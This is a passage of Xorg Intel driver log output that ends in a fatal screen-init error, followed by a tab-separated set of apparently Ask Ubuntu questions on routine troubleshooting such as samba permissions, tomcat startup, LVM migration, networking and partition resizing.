( 0 ) : not using default mode `` 840x525 '' ( doublescan mode not supported ) [ 4.216 ] ( ii ) intel ( 0 ) : not using default mode `` 840x525 '' ( doublescan mode not supported ) [ 4.216 ] ( ii ) intel ( 0 ) : not using default mode `` 960x540 '' ( doublescan mode not supported ) [ 4.216 ] ( ii ) intel ( 0 ) : not using default mode `` 960x600 '' ( doublescan mode not supported ) [ 4.216 ] ( ii ) intel ( 0 ) : not using default mode `` 1024x768 '' ( doublescan mode not supported ) [ 4.216 ] ( ii ) intel ( 0 ) : printing probed modes for output lvds1 [ 4.216 ] ( ii ) intel ( 0 ) : modeline `` 1920x1080 '' x59.9 138.50 1920 1968 2000 2080 1080 1083 1088 1111 -hsync -vsync ( 66.6 khz ep ) [ 4.216 ] ( ii ) intel ( 0 ) : modeline `` 1680x1050 '' x60.0 146.25 1680 1784 1960 2240 1050 1053 1059 1089 -hsync +vsync ( 65.3 khz d ) [ 4.216 ] ( ii ) intel ( 0 ) : modeline `` 1680x1050 '' x59.9 119.00 1680 1728 1760 1840 1050 1053 1059 1080 +hsync -vsync ( 64.7 khz d ) [ 4.216 ] ( ii ) intel ( 0 ) : modeline `` 1600x1024 '' x60.2 103.12 1600 1600 1656 1664 1024 1024 1029 1030 +hsync +vsync ( 62.0 khz d ) [ 4.216 ] ( ii ) intel ( 0 ) : modeline `` 1400x1050 '' x60.0 122.00 1400 1488 1640 1880 1050 1052 1064 1082 +hsync +vsync ( 64.9 khz d ) [ 4.216 ] ( ii ) intel ( 0 ) : modeline `` 1280x1024 '' x60.0 108.00 1280 1328 1440 1688 1024 1025 1028 1066 +hsync +vsync ( 64.0 khz d ) [ 4.216 ] ( ii ) intel ( 0 ) : modeline `` 1440x900 '' x59.9 106.50 1440 1520 1672 1904 900 903 909 934 -hsync +vsync ( 55.9 khz d ) [ 4.216 ] ( ii ) intel ( 0 ) : modeline `` 1280x960 '' x60.0 108.00 1280 1376 1488 1800 960 961 964 1000 +hsync +vsync ( 60.0 khz d ) [ 4.216 ] ( ii ) intel ( 0 ) : modeline `` 1360x768 '' x59.8 84.75 1360 1432 1568 1776 768 771 781 798 -hsync +vsync ( 47.7 khz d ) [ 4.216 ] ( ii ) intel ( 0 ) : modeline `` 1360x768 '' x60.0 72.00 1360 1408 1440 1520 768 771 781 790 +hsync -vsync ( 47.4 khz d ) [ 4.216 ] ( ii ) intel ( 0 ) : modeline `` 1152x864 '' x60.0 81.62 1152 1216 1336 1520 864 865 868 895 -hsync +vsync ( 53.7 khz d ) [ 4.216 ] ( ii ) intel ( 0 ) : modeline `` 1024x768 '' x60.0 65.00 1024 1048 1184 1344 768 771 777 806 -hsync -vsync ( 48.4 khz d ) [ 4.216 ] ( ii ) intel ( 0 ) : modeline `` 800x600 '' x60.3 40.00 800 840 968 1056 600 601 605 628 +hsync +vsync ( 37.9 khz d ) [ 4.216 ] ( ii ) intel ( 0 ) : modeline `` 800x600 '' x56.2 36.00 800 824 896 1024 600 601 603 625 +hsync +vsync ( 35.2 khz d ) [ 4.216 ] ( ii ) intel ( 0 ) : modeline `` 640x480 '' x59.9 25.18 640 656 752 800 480 490 492 525 -hsync -vsync ( 31.5 khz d ) [ 4.368 ] ( ii ) intel ( 0 ) : edid for output vga1 [ 4.368 ] ( ii ) intel ( 0 ) : manufacturer : aci model : 2493 serial # : 16843009 [ 4.368 ] ( ii ) intel ( 0 ) : year : 2013 week : 41 [ 4.368 ] ( ii ) intel ( 0 ) : edid version : 1.3 [ 4.368 ] ( ii ) intel ( 0 ) : analog display input , input voltage level : 0.700/0.300 v [ 4.368 ] ( ii ) intel ( 0 ) : signal levels configurable [ 4.368 ] ( ii ) intel ( 0 ) : sync : separate composite syncongreen [ 4.368 ] ( ii ) intel ( 0 ) : max image size [ cm ] : horiz . : 53 vert . : 30 [ 4.368 ] ( ii ) intel ( 0 ) : gamma : 2.20 [ 4.368 ] ( ii ) intel ( 0 ) : dpms capabilities : standby suspend off ; rgb/color display [ 4.368 ] ( ii ) intel ( 0 ) : first detailed timing is preferred mode [ 4.368 ] ( ii ) intel ( 0 ) : redx : 0.641 redy : 0.338 greenx : 0.315 greeny : 0.629 [ 4.368 ] ( ii ) intel ( 0 ) : bluex : 0.159 bluey : 0.059 whitex : 0.313 whitey : 0.329 [ 4.368 ] ( ii ) intel ( 0 ) : supported established timings : [ 4.368 ] ( ii ) intel ( 0 ) : 720x400 @ 70hz [ 4.368 ] ( ii ) intel ( 0 ) : 640x480 @ 60hz [ 4.368 ] ( ii ) intel ( 0 ) : 640x480 @ 67hz [ 4.368 ] ( ii ) intel ( 0 ) : 640x480 @ 72hz [ 4.368 ] ( ii ) intel ( 0 ) : 640x480 @ 75hz [ 4.368 ] ( ii ) intel ( 0 ) : 800x600 @ 56hz [ 4.368 ] ( ii ) intel ( 0 ) : 800x600 @ 60hz [ 4.368 ] ( ii ) intel ( 0 ) : 800x600 @ 72hz [ 4.368 ] ( ii ) intel ( 0 ) : 800x600 @ 75hz [ 4.368 ] ( ii ) intel ( 0 ) : 832x624 @ 75hz [ 4.368 ] ( ii ) intel ( 0 ) : 1024x768 @ 60hz [ 4.368 ] ( ii ) intel ( 0 ) : 1024x768 @ 70hz [ 4.368 ] ( ii ) intel ( 0 ) : 1024x768 @ 75hz [ 4.368 ] ( ii ) intel ( 0 ) : 1280x1024 @ 75hz [ 4.368 ] ( ii ) intel ( 0 ) : manufacturer 's mask : 0 [ 4.368 ] ( ii ) intel ( 0 ) : supported standard timings : [ 4.368 ] ( ii ) intel ( 0 ) : # 0 : hsize : 1152 vsize 864 refresh : 75 vid : 20337 [ 4.368 ] ( ii ) intel ( 0 ) : # 1 : hsize : 1280 vsize 1024 refresh : 60 vid : 32897 [ 4.368 ] ( ii ) intel ( 0 ) : # 2 : hsize : 1280 vsize 960 refresh : 60 vid : 16513 [ 4.368 ] ( ii ) intel ( 0 ) : # 3 : hsize : 1440 vsize 900 refresh : 60 vid : 149 [ 4.368 ] ( ii ) intel ( 0 ) : # 4 : hsize : 1600 vsize 1200 refresh : 60 vid : 16553 [ 4.368 ] ( ii ) intel ( 0 ) : # 5 : hsize : 1680 vsize 1050 refresh : 60 vid : 179 [ 4.368 ] ( ii ) intel ( 0 ) : # 6 : hsize : 1920 vsize 1080 refresh : 60 vid : 49361 [ 4.368 ] ( ii ) intel ( 0 ) : supported detailed timing : [ 4.368 ] ( ii ) intel ( 0 ) : clock : 148.5 mhz image size : 531 x 299 mm [ 4.368 ] ( ii ) intel ( 0 ) : h_active : 1920 h_sync : 2008 h_sync_end 2052 h_blank_end 2200 h_border : 0 [ 4.368 ] ( ii ) intel ( 0 ) : v_active : 1080 v_sync : 1084 v_sync_end 1089 v_blanking : 1125 v_border : 0 [ 4.368 ] ( ii ) intel ( 0 ) : ranges : v min : 50 v max : 76 hz , h min : 30 h [ 4.507 ] ( ii ) intel ( 0 ) : edid for output hdmi1 [ 4.507 ] ( ii ) intel ( 0 ) : manufacturer : aci model : 2493 serial # : 16843009 [ 4.507 ] ( ii ) intel ( 0 ) : year : 2012 week : 38 [ 4.507 ] ( ii ) intel ( 0 ) : edid version : 1.3 [ 4.507 ] ( ii ) intel ( 0 ) : digital display input [ 4.507 ] ( ii ) intel ( 0 ) : max image size [ cm ] : horiz . : 53 vert . : 30 [ 4.507 ] ( ii ) intel ( 0 ) : gamma : 2.20 [ 4.507 ] ( ii ) intel ( 0 ) : dpms capabilities : standby suspend off [ 4.507 ] ( ii ) intel ( 0 ) : supported color encodings : rgb 4:4:4 ycrcb 4:4:4 [ 4.507 ] ( ii ) intel ( 0 ) : first detailed timing is preferred mode [ 4.507 ] ( ii ) intel ( 0 ) : redx : 0.641 redy : 0.338 greenx : 0.315 greeny : 0.629 [ 4.507 ] ( ii ) intel ( 0 ) : bluex : 0.159 bluey : 0.059 whitex : 0.313 whitey : 0.329 [ 4.507 ] ( ii ) intel ( 0 ) : supported established timings : [ 4.507 ] ( ii ) intel ( 0 ) : 720x400 @ 70hz [ 4.507 ] ( ii ) intel ( 0 ) : 640x480 @ 60hz [ 4.507 ] ( ii ) intel ( 0 ) : 640x480 @ 67hz [ 4.507 ] ( ii ) intel ( 0 ) : 640x480 @ 72hz [ 4.507 ] ( ii ) intel ( 0 ) : 640x480 @ 75hz [ 4.507 ] ( ii ) intel ( 0 ) : 800x600 @ 56hz [ 4.507 ] ( ii ) intel ( 0 ) : 800x600 @ 60hz [ 4.507 ] ( ii ) intel ( 0 ) : 800x600 @ 72hz [ 4.507 ] ( ii ) intel ( 0 ) : 800x600 @ 75hz [ 4.507 ] ( ii ) intel ( 0 ) : 832x624 @ 75hz [ 4.507 ] ( ii ) intel ( 0 ) : 1024x768 @ 60hz [ 4.507 ] ( ii ) intel ( 0 ) : 1024x768 @ 70hz [ 4.507 ] ( ii ) intel ( 0 ) : 1024x768 @ 75hz [ 4.507 ] ( ii ) intel ( 0 ) : 1280x1024 @ 75hz [ 4.507 ] ( ii ) intel ( 0 ) : manufacturer 's mask : 0 [ 4.507 ] ( ii ) intel ( 0 ) : supported standard timings : [ 4.507 ] ( ii ) intel ( 0 ) : # 0 : hsize : 1152 vsize 864 refresh : 75 vid : 20337 [ 4.507 ] ( ii ) intel ( 0 ) : # 1 : hsize : 1280 vsize 1024 refresh : 60 vid : 32897 [ 4.507 ] ( ii ) intel ( 0 ) : # 2 : hsize : 1280 vsize 960 refresh : 60 vid : 16513 [ 4.507 ] ( ii ) intel ( 0 ) : # 3 : hsize : 1440 vsize 900 refresh : 60 vid : 149 [ 4.507 ] ( ii ) intel ( 0 ) : # 4 : hsize : 1600 vsize 1200 refresh : 60 vid : 16553 [ 4.507 ] ( ii ) intel ( 0 ) : # 5 : hsize : 1680 vsize 1050 refresh : 60 vid : 179 [ 4.507 ] ( ii ) intel ( 0 ) : # 6 : hsize : 1920 vsize 1080 refresh : 60 vid : 49361 [ 4.507 ] ( ii ) intel ( 0 ) : supported detailed timing : [ 4.507 ] ( ii ) intel ( 0 ) : clock : 148.5 mhz image size : 531 x 299 mm [ 4.507 ] ( ii ) intel ( 0 ) : h_active : 1920 h_sync : 2008 h_sync_end 2052 h_blank_end 2200 h_border : 0 [ 4.507 ] ( ii ) intel ( 0 ) : v_active : 1080 v_sync : 1084 v_sync_end 1089 v_blanking : 1125 v_border : 0 [ 4.507 ] ( ii ) intel ( 0 ) : ranges : v min : 50 v max : 76 hz , h min : 30 h max : 83 khz , pixclock max 175 mhz [ 4.507 ] ( ii ) intel ( 0 ) : monitor name : ve247 [ 4.507 ] ( ii ) intel ( 0 ) : serial no : c9lmqs036180 [ 4.507 ] ( ii ) intel ( 0 ) : supported detailed timing : [ 4.507 ] ( ii ) intel ( 0 ) : clock : 138.5 mhz image size : 531 x 299 mm [ 4.507 ] ( ii ) intel ( 0 ) : h_active : 1920 h_sync : 1968 h_sync_end 2000 h_blank_end 2080 h_border : 0 [ 4.507 ] ( ii ) intel ( 0 ) : v_active : 1080 v_sync : 1083 v_sync_end 1088 v_blanking : 1110 v_border : 0 [ 4.507 ] ( ii ) intel ( 0 ) : supported detailed timing : [ 4.507 ] ( ii ) intel ( 0 ) : clock : 85.5 mhz image size : 531 x 299 mm [ 4.507 ] ( ii ) intel ( 0 ) : h_active : 1366 h_sync : 1436 h_sync_end 1579 h_blank_end 1792 h_border : 0 [ 4.507 ] ( ii ) intel ( 0 ) : v_active : 768 v_sync : 771 v_sync_end 774 v_blanking : 798 v_border : 0 [ 4.507 ] ( ii ) intel ( 0 ) : supported detailed timing : [ 4.507 ] ( ii ) intel ( 0 ) : clock : 74.2 mhz image size : 531 x 299 mm [ 4.507 ] ( ii ) intel ( 0 ) : h_active : 1280 h_sync : 1390 h_sync_end 1430 h_blank_end 1650 h_border : 0 [ 4.507 ] ( ii ) intel ( 0 ) : v_active : 720 v_sync : 725 v_sync_end 730 v_blanking : 750 v_border : 0 [ 4.507 ] ( ii ) intel ( 0 ) : supported detailed timing : [ 4.507 ] ( ii ) intel ( 0 ) : clock : 27.0 mhz image size : 531 x 299 mm [ 4.507 ] ( ii ) intel ( 0 ) : h_active : 720 h_sync : 736 h_sync_end 798 h_blank_end 858 h_border : 0 [ 4.507 ] ( ii ) intel ( 0 ) : v_active : 480 v_sync : 489 v_sync_end 495 v_blanking : 525 v_border : 0 [ 4.507 ] ( ii ) intel ( 0 ) : supported detailed timing : [ 4.507 ] ( ii ) intel ( 0 ) : clock : 74.2 mhz image size : 531 x 299 mm [ 4.507 ] ( ii ) intel ( 0 ) : h_active : 1920 h_sync : 2008 h_sync_end 2052 h_blank_end 2200 h_border : 0 [ 4.507 ] ( ii ) intel ( 0 ) : v_active : 540 v_sync : 542 v_sync_end 547 [ 4.556 ] ( ii ) intel ( 0 ) : edid for output dp1 [ 4.556 ] ( ii ) intel ( 0 ) : output lvds1 connected [ 4.556 ] ( ii ) intel ( 0 ) : output vga1 connected [ 4.556 ] ( ii ) intel ( 0 ) : output hdmi1 connected [ 4.556 ] ( ii ) intel ( 0 ) : output dp1 disconnected [ 4.556 ] ( ii ) intel ( 0 ) : using exact sizes for initial modes [ 4.556 ] ( ii ) intel ( 0 ) : output lvds1 using initial mode 1920x1080 [ 4.556 ] ( ii ) intel ( 0 ) : output vga1 using initial mode 1920x1080 [ 4.556 ] ( ii ) intel ( 0 ) : output hdmi1 using initial mode 1920x1080 [ 4.556 ] ( ii ) intel ( 0 ) : using default gamma of ( 1.0 , 1.0 , 1.0 ) unless otherwise stated . [ 4.556 ] ( ii ) intel ( 0 ) : kernel page flipping support detected , enabling [ 4.556 ] ( == ) intel ( 0 ) : dpi set to ( 96 , 96 ) [ 4.556 ] ( ii ) loading sub module `` fb '' [ 4.556 ] ( ii ) loadmodule : `` fb '' [ 4.556 ] ( ii ) loading /usr/lib/xorg/modules/libfb.so [ 4.558 ] ( ii ) module fb : vendor= '' x.org foundation '' [ 4.558 ] compiled for 1.13.0 , module version = 1.0.0 [ 4.558 ] abi class : x.org ansi c emulation , version 0.4 [ 4.558 ] ( ii ) loading sub module `` dri2 '' [ 4.558 ] ( ii ) loadmodule : `` dri2 '' [ 4.558 ] ( ii ) module `` dri2 '' already built-in [ 4.558 ] ( ii ) unloadmodule : `` vesa '' [ 4.558 ] ( ii ) unloading vesa [ 4.558 ] ( ii ) unloadmodule : `` modesetting '' [ 4.558 ] ( ii ) unloading modesetting [ 4.558 ] ( ii ) unloadmodule : `` fbdev '' [ 4.558 ] ( ii ) unloading fbdev [ 4.558 ] ( ii ) unloadsubmodule : `` fbdevhw '' [ 4.558 ] ( ii ) unloading fbdevhw [ 4.558 ] ( == ) depth 24 pixmap format is 32 bpp [ 4.558 ] ( ii ) intel ( 0 ) : [ dri2 ] setup complete [ 4.558 ] ( ii ) intel ( 0 ) : [ dri2 ] dri driver : i965 [ 4.558 ] ( ii ) intel ( 0 ) : allocated new frame buffer 1920x1080 stride 7680 , tiled [ 4.559 ] ( ii ) uxa ( 0 ) : driver registered support for the following operations : [ 4.559 ] ( ii ) solid [ 4.559 ] ( ii ) copy [ 4.559 ] ( ii ) composite ( render acceleration ) [ 4.559 ] ( ii ) put_image [ 4.559 ] ( ii ) get_image [ 4.559 ] ( == ) intel ( 0 ) : backing store disabled [ 4.559 ] ( == ) intel ( 0 ) : silken mouse enabled [ 4.559 ] ( ii ) intel ( 0 ) : initializing hw cursor [ 4.559 ] ( ii ) intel ( 0 ) : randr 1.2 enabled , ignore the following randr disabled message . [ 4.560 ] ( == ) intel ( 0 ) : dpms enabled [ 4.560 ] ( == ) intel ( 0 ) : intel xvmc decoder enabled [ 4.560 ] ( ii ) intel ( 0 ) : set up textured video [ 4.560 ] ( ii ) intel ( 0 ) : [ xvmc ] xvmc_vld driver initialized . [ 4.560 ] ( ii ) intel ( 0 ) : direct rendering : dri2 enabled [ 4.560 ] ( == ) intel ( 0 ) : hotplug detection : `` enabled '' [ 4.588 ] ( ee ) intel ( 0 ) : failed to set mode : invalid argument [ 4.588 ] fatal server error : [ 4.588 ] addscreen/screeninit failed for driver 0 [ 4.588 ] [ 4.588 ] ( ee )
439957	fire command on client system from server	i have two ubuntu systems one server and another is client . so i have written one script on server , following are the code of script file : code for login into the client system `sshpass -p prakash12 ssh -p 11111 prakash @ localhost` this command must have to fire on logged on client system . $ { home } /temp/.git describe -- always -- tags head the first command executed successfully for logged on to the client system.but second command is get fired on server system insted fired on logged on system . so how can i fired the second command on the client system from the server .
439958	touchpad heating up on dell inspiron n5010	my laptop dell inspiron n5010 runs an ubuntu 12.04.4 lts 64 bit version . i have installed all the necessary fglrx drivers and the laptop temperature is not very high . it persistently remains between 45-60 degree centigrades . but the problem is that the touchpad is heating up due to some unknown reason and hurting my fingers . in windows 7 , the touchpad did not heat up so much with the laptop temperature staying almost in the same range as in ubuntu . ( i used psensor in ubuntu and speedfan in windows 7 to determine core temperatures ) . can anyone please help me with this , is there any workaround to prevent the touchpad from overheating ? also , will an overheated touchpad cause problems in the laptop in the long run ?
439961	tomcat7 not staring completely	i 've installed tomcat7 as best i can via apt-get ( after removing a perfectly working tomcat6 ) on ubuntu running on a vmware image . i 've added a user with several manager roles in tomcat-users.xml and have modified the connector 's port from 8080 to 80 . when i start tomcat with `` sudo service start tomcat7 '' i get the message : * starting tomcat servlet engine tomcat7 but my browser does n't get any response from either localhost:80 or localhost:8080 . furthermore , netstat | grep 80 does n't show either port 80 or port 8080 in use . i can find no trace of any log files in or around the catalina directory referred to by both $ catalina_home and $ catalina_base . should i be looking somewhere else for the logs ? any other recommendations ?
439967	how to create lan connection ( network ) between 2 or more desktops on ubuntu 12.04	i 've got two desktops on ubuntu 12.04 and are connected to a router , so the internet is working fine on both . however i 'm unable to see the machines under the network . what needs to be done so that i can see and access machines from the network section ?
439969	keyboard switch	ubuntu 13.10 i like switching by left shift + alt . and it works . but only in that succession . does not react on reversed or simultaneous press . how to fix , or do i want too much ?
439971	teamviewer wakeonlan tty	i have an old thinkpad in the kitchen - let 's call it `` kitchen '' - with ubuntu 12.04 and teamviewer latest version installed . teamviewer 9 latest version allows wakeonlan and i can `` wake '' kitchen from a windows 7 pc with that same version of teamviewer but ... in some cases ( 30-50 % ) of the `` wakes '' kitchen ends up with this text on a black screen in text-mode : ubuntu 12.04.4 lts kitchen tty1 kitchen login : _ and the cursor is blinking - nothing more happens on the windows 7 machine and the normal login on the kitchen is not accepted . what is wrong here - sometimes it works fine and sometimes it do n't ?
439974	what is the difference between which gcc and dpkg -l | grep gcc	based on ubuntu 12.04 man page for which which returns the pathnames of the files ( or links ) which would be exe- cuted in the current environment , had its arguments been given as com- mands in a strictly posix-conformant shell . it does this by searching the path for executable files matching the names of the arguments . it does not follow symbolic links . i also know that if you want to make sure you have installed a program , you can type dpkg -l | grep myprogram . recently , i downloaded gcc41 and g++41 from a deb package . i installed them with the following command : sudo dpkg -i gcc41-compat-4.1.2_i386.deb g++41-compat-4.1.2_i386.deb . my problem is that when i type dpkg -l | grep gcc i see this ii gcc 4:4.6.3-1ubuntu5 gnu c compiler ii gcc-4.5 4.5.3-12ubuntu2 the gnu c compiler ii gcc-4.5-base 4.5.3-12ubuntu2 the gnu compiler collection ( base package ) ii gcc-4.6 4.6.3-1ubuntu5 gnu c compiler ii gcc-4.6-base 4.6.3-1ubuntu5 gcc , the gnu compiler collection ( base package ) ii gcc41-compat 4.1.2 no description ii libgcc1 1:4.6.3-1ubuntu5 as you can see , gcc41-compat is installed , but when i type which gcc41 there is not any result . based on the man page that i mentioned above , i should see something . where is it ? or which part of my conclusion is wrong ?
439975	levelling out audio over a certain limit	i 'm looking for a way of doing this to ease audio listening . for normal volume files , i 'll adjust hardware volume knob to match them . for other files that are high volume due to poor source , or recording , i want something that will level out all sound exceeding a certain limit that i set while not touching other portions , just the higher volume portions . how can this be achieved , if not system wide , then what application with dsp ?
439976	can not access package manager troubleshooting procedure	i have the following error : e : the package dassault-systemes-draftsight needs to be reinstalled , but i ca n't find an archive for it i think i need to access the package manager troubleshooting procedure but i 've tried most of today and the site never loads . am i doing something wrong ? at the moment i ca n't install or uninstall any software . i am running chrome on 13.10
439987	move a system from lvm to standard partitions	i need to move a system which uses lvm to a system which uses normal partitions . i created the partitions on the new hard drive and i copied all the content of the root and boot partition to the new hard drive . finally i modified fstab and reinstalled grub , but if i try to boot the system i see the error : system no longer boots , gave up waiting for root device , ( initramfs ) , /dev/mapper/old_lvm_volume_name-root does not exist moreover , if i use the initramfs prompt i do not find any /dev/sd* device , even if i am sure that there should be a /dev/sda1 ( it exists as expected from a live cd ) . how can i remove all the references to the old lvm volume and boot using /dev/sda1 as a root partition ?
439990	vnc viewer several operations do not work	i have 2 pcs ( both ubuntu 13.10 ) . if i conntect from one pc to the other using vncviewer i can not do several operations : multiple select with mouseclick ( shift or ctrl ) does not work - only one item is selected special keys like `` home '' , `` end '' do not work ( nothing happens ) i guess it has something to do with some settings - can anybody help please ?
439992	restart when trying to resize partition	i am brand new to ubuntu ( and installing operative systems/partitioning/etc ... ) and up to know everything has been going smoothly , but now i 'm having a problem that i think i can fix , but just do n't know how ... i wanted to have a dual-boot , so i installed windows and then ubuntu in separate partitions . my disk available space is about 580gb , i gave 230gb to windows and when installing ubuntu , i set up a partition of 120gb with a 8gb swap space . the problem i have now is that ubuntu took all the remaining space in my disk . i wanted the remaining 230gb to be a partition to keep my files . so , what i tried to do was to resize ( reduce ) the ubuntu partition from the ubuntu installation cd . i started gparted after running the `` try ubuntu '' option , made `` swapoff '' to the swap partition , reduced the size and then applying the operations ... up to know everything seemed to work , just that the computer turns off itself after five minutes or so when applying the operations . i tried this several times with no success . now i 'm afraid i wo n't be able to make the resize operation ... i do n't adventure into any other possibilities , since i 'm afraid to screw up my boot . what am i missing ? is there any other alternative i can use ?
439993	shell scripting editor in ubuntu 13.10	i want to do some shell scripting on my ubuntu 13.10 ( 32-bit ) desktop . how can i create shell scripts using the editor . since i am not familiar with the ubuntu editor gedit . is it possible to do it with vim . if yes , then which package would be suitable for me .
439994	can not run php codes through netbeans after installing xampp	i installed xampp and netbeans to start learning php . after i wrote this code < html > < head > < meta charset= '' utf-8 '' > < title > < /title > < /head > < body > < ? php echo 'hello world ' ; ? > < /body > i got this object not found ! the requested url was not found on this server . if you entered the url manually please check your spelling and try again . if you think this is a server error , please contact the webmaster . error 404 localhost apache/2.4.7 ( unix ) openssl/1.0.1f php/5.5.9 mod_perl/2.0.8-dev perl/v5.16.3
439995	13.10—shutdown impossible	i have a freshly installed ubuntu on a new desktop . i am using the following drivers from the image below . i was searching half of the internet , found a lot of fixes for the » can not shutdown« bug but none of fixes worked for me . whatever i do , the computer just restarts , no matter if i shutdown from terminal or by button . i tried tweaking the grub config , or the tricks with the dconfig editor , nothing works . what else can i do to fix it ? thanks in ahead ! well there are a lot of proposed fixes , sudo shutdown -p now this one tweaking /etc/default/grub , by changing this line ( adding acpi=noirq ) : grub_cmdline_linux_default= '' quiet splash acpi=noirq '' followed by a sudo update-grub and some more i do not find again . edit : i entered the bios and disabled wake-on-lan , now it shuts down , but i would appreciate a solution with which i could use the feature nevertheless .
439998	installing a light table ( editor ) in debian	i want to install lighttable programming editor in kali linux ( debian ) .i have downloaded the tar.gz version from here . but i am unable to install the light table .please help in regarding this .
439999	ip address changes in vmware ?	i am using ubuntu 13.10 in vmware on my windows pc . so the problem is : when i see my ip using ifconfig command then it shows 198.168.33.180 , but when i see my ip on whatismyip.com ( on ubuntu ) , it shows my ip 37.x.x.x . is there any way to resolve this ? i do n't want this ip address 198.168.33.180 to be shown using ifconfig command for some reasons . please help . thanks in advanced .
440001	why is my inet for ip colored red ?	i 'm trying to set up a web server but when i try to see the ip of the server with this code ifconfig | grep inet the four inet that comes up is colored red and shows some numbers . if i continue another message comes up and tells me that there is nothing wrong with my ip . what is wrong and what can i do ?
440002	if i turn on the uefi , will my bios mode installed operating systems be damaged in any way ?	i have triple boot system . one of them is ubuntu . all of them are installed in legacy bios mode . whenever i boot to ubuntu , it shows kvm disabled by bios . my pc supports uefi bios hardware which is turned off . if i turn on the uefi firmware ( disabling bios ) , will my operating systems be damaged in any way or will it be beneficial ?
440006	samba permissions between 2 linux machines	been pulling my hair out for days over this . i 'm sure the problem lies not with the samba configuration itself , but permissions , and i 'm at a loss to figure out what 's wrong ! here 's my samba share configuration : [ documents ] comment = documents path = /allspark/documents vaild users = carlo , natalie , @ smbusers browsable = yes guest ok = no read only = no force group = smbusers create mask = 0775 force directory mode = 2775 i 've got the 2 users : carlo and natalie in the smbusers group . /allspark/documents is owned by chief and the group smbusers ( chief is the main login on the server ) . in windows , i access my share with carlo and all is good , i have all the correct permissions and the files are owned by me . on the laptop with ubuntu , and logging in as natalie , when i connect to the share and try to copy a file into the share i get an error message saying the file can not be found . i think the problem may lie with the ubuntu laptop and permissions . on the laptop as user natalie i can make a new folder and checking the permissions via ls -l shows it 's correct . the problem seems to lie with dragging files from the laptop to /documents . i can save a new file to the server but after that can not access it . checking permissions it says that i do n't own the file but i made it just two seconds ago !
440007	extremely slow internet over ethernet cable and no wifi at all on hpg5000	i just installed ubuntu 12.04 on an old hp g5000 there is no wifi and the internet connection is extremely slow over the ethernet cable , seems no more that few kb/s , e.g . the browser is able to download the page title , but nothing else . the ethernet cable works perfectly with other laptops and it worked perfectly with the same laptop when it had windows just 1 hour prior to installing ubuntu . i am new to linux . executed a few lines of code in the terminal that were used in other similar topics , but i have very limited understanding on what it all means . inese @ inese-hp : ~ $ ifconfig eth0 link encap : ethernet hwaddr 00:1b:38:2f:04:8d inet addr:192.168.2.125 bcast:192.168.2.255 mask:255.255.255.0 inet6 addr : fe80 : :21b:38ff : fe2f:48d/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:122 errors:68 dropped:0 overruns:0 frame:0 tx packets:186 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:33749 ( 33.7 kb ) tx bytes:26731 ( 26.7 kb ) lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:28 errors:0 dropped:0 overruns:0 frame:0 tx packets:28 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:3404 ( 3.4 kb ) tx bytes:3404 ( 3.4 kb ) inese @ inese-hp : ~ $ netstat -nr kernel ip routing table destination gateway genmask flags mss window irtt iface 0.0.0.0 192.168.2.1 0.0.0.0 ug 0 0 0 eth0 169.254.0.0 0.0.0.0 255.255.0.0 u 0 0 0 eth0 192.168.2.0 0.0.0.0 255.255.255.0 u 0 0 0 eth0 inese @ inese-hp : ~ $ ping -c 4 google.com ping google.com ( 195.122.16.29 ) 56 ( 84 ) bytes of data . 64 bytes from cache.google.com ( 195.122.16.29 ) : icmp_req=1 ttl=60 time=23.4 ms 64 bytes from cache.google.com ( 195.122.16.29 ) : icmp_req=2 ttl=60 time=23.5 ms 64 bytes from cache.google.com ( 195.122.16.29 ) : icmp_req=3 ttl=60 time=22.0 ms 64 bytes from cache.google.com ( 195.122.16.29 ) : icmp_req=4 ttl=60 time=23.6 ms -- - google.com ping statistics -- - 4 packets transmitted , 4 received , 0 % packet loss , time 3004ms rtt min/avg/max/mdev = 22.043/23.155/23.650/0.656 ms inese @ inese-hp : ~ $ sudo lshw -c network *-network description : network controller product : bcm4311 802.11b/g wlan vendor : broadcom corporation physical id : 0 bus info : pci @ 0000:06:00.0 version : 01 width : 32 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list configuration : driver=b43-pci-bridge latency=0 resources : irq:18 memory:40400000-40403fff *-network description : ethernet interface product : rtl-8139/8139c/8139c+ vendor : realtek semiconductor co. , ltd. physical id : 8 bus info : pci @ 0000:08:08.0 logical name : eth0 version : 10 serial : 00:1b:38:2f:04:8d size : 100mbit/s capacity : 100mbit/s width : 32 bits clock : 33mhz capabilities : pm bus_master cap_list ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=8139too driverversion=0.9.28 duplex=full ip=192.168.2.125 latency=32 link=yes maxlatency=64 mingnt=32 multicast=yes port=mii speed=100mbit/s resources : irq:16 ioport:2000 ( size=256 ) memory : d0100000-d01000ff inese @ inese-hp : ~ $ lspci -nnk | grep -ia2 net subsystem : hewlett-packard company device [ 103c:30a5 ] kernel modules : i2c-i801 06:00.0 network controller [ 0280 ] : broadcom corporation bcm4311 802.11b/g wlan [ 14e4:4311 ] ( rev 01 ) subsystem : hewlett-packard company bcm4311 802.11b/g wireless lan controller [ 103c:1364 ] kernel driver in use : b43-pci-bridge kernel modules : ssb 08:08.0 ethernet controller [ 0200 ] : realtek semiconductor co. , ltd. rtl-8139/8139c/8139c+ [ 10ec:8139 ] ( rev 10 ) subsystem : hewlett-packard company device [ 103c:30a5 ] kernel driver in use : 8139too thank you ! atis
440010	is there a way to cloud backup applications ?	i 'm using ubuntu 13.10 . i have downloaded most appropriate applications from various categories of ubuntu software center as per my need . it took a lot of effort to search , download and try each application and select among those which suited me best . for example , i downloaded english dictionaries like goldendict , artha , stardict etc. , tried them all and selected artha for my personal use . now when i have made my collection i do n't want to go through this type of searching and downloading in future again . is there a way to backup my applications ( at least name or along with its data if possible ) like in android or ios so that i can view my installed applications in one place for easy access for future installation if needed ?
440015	libre office page numbers latin and arabic	well i would like to add page numbers but i cant edit the output of them . what i want to do is put latin page numbers in the first 3 pages and then add arabic numbers from page 4 until the end ( obviously i would like page 4 have the arabic number 1 ) thanks in advance
